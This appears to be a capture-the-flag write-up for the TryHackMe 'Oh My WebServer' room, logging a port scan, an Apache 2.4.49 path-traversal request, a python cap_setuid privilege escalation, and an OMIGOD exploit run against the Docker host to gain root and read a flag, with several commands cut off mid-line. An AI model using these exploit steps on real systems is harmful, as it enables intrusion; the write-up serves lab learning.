Oh My WebServer
Initial Scan
root@ip-10-10-4-90:~# rustscan -a 10.10.195.101 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time \u231b
[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size
Open 10.10.195.101:22
Open 10.10.195.101:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; p
80/tcp open http syn-ack Apache httpd 2.4.49 ((Unix))
|_http-favicon: Unknown favicon MD5: 02FD5D10B62C7BC5AD03F8B0F105323C
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
Oh My WebServer 1
� |_http-title: Consult - Business Consultancy Agency Template | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access
🚨
root@ip-10-10-4-90:~# curl -X TRACE -H "X-Header: Attila21" 10.10.195.101
TRACE / HTTP/1.1
Host: 10.10.195.101
User-Agent: curl/7.58.0
Accept: */*
X-Header: Attila21
root@ip-10-10-4-90:~#
curl 'http://10.10.195.101/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%
Privilege Escalation
🚨
daemon@4a70924bafa0:/dev/shm$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep
Futher Ennumeration
Oh My WebServer 2
� 🚨
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 9134 bytes 2365947 (2.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9683 bytes 10622282 (10.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
python3 exp.py -t 172.17.0.1 -c 'whoami;pwd;id;hostname;uname -a;cat /root/root
id
root
/var/opt/microsoft/scx/tmp
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Linux ubuntu 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021
THM{7f147ef1f36da9ae29529890a1b6011f}
Creds
Services User names Passwords
Oh My WebServer 3
� Services User names Passwords
Exploits links
https://github.com/AlteredSecurity/CVE-2021-38647
python | GTFOBins
The payloads are compatible with both Python version 2 and 3. It can be used to break out from
restricted environments by spawning an interactive system shell. It can send back a reverse shell to a
listening attacker to open a remote network access. Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on
https://gtfobins.github.io/gtfobins/python/#capabilities
https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-
server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013
Oh My WebServer 4
